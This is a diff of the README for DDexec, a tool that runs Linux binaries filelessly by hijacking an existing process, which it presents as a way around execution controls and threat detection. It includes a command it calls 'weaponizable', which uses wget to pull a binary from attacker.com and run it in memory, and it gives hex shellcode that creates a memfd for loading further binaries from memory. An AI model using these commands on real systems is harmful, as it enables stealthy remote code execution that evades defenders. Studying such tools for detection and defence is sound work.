arget13/DDexec/README.md

-# DDexec
+# DDexec news
+I have updated DDexec so much it is barely recognizable, the parsing of the ELF is now done by machine code instead of by the shell script, making it far faster, reliable and comprehensible.
+It has also reduced its number of dependencies to the absolute minimum.

+It also now barely depends on the shell's arithmetic, [which may make it work on Android](https://github.com/arget13/DDexec/issues/13).

 ## Context
 In Linux in order to run a program it must exist as a file, it must be accessible in some way through the file system hierarchy (this is just how `execve()` works).
 This file may reside on disk or in ram (tmpfs, memfd) but you need a filepath.
 This has made very easy to control what is run on a Linux system, it makes easy to detect threats and attacker's tools or to prevent them from trying to execute anything of theirs at all (_e. g._ not allowing unprivileged users to place executable files anywhere).

-But this technique is here to change all of this.
-If you can not start the process you want... then you hijack one already existing.
+Well, if you cannot start the process you want... then you hijack and torture one already existing until it pleases your desires.

 ## Usage
-Pipe into the `ddexec.sh` script the base64 of the binary you want to run (**without** newlines).
+Pipe into the `ddexec.sh` script the binary you want to run.
 The arguments for the script are the arguments for the program (starting with `argv[0]`).

 Here, try this:
 ```
-base64 -w0 /bin/ls | bash ddexec.sh ls -lA
+bash ddexec.sh ls -lA < /bin/ls
 ```
 which is easily weaponizable with something like
 ```
-wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
+wget -O- https://attacker.com/binary.elf | bash ddexec.sh argv0 foo bar
 ```

-There is also the `ddsc.sh` script that allows you to run binary code directly.
+There is also the `ddsc.sh` script that allows you to run machine code directly.
 The following is an example of the use of a shellcode that will create a memfd (a file descriptor pointing to a file in memory) to which we can later write binaries and run them, from memory obviously.
 ```
 bash ddsc.sh -x <<< "68444541444889e74831f64889f0b401b03f0f054889c7b04d0f05b0220f05" &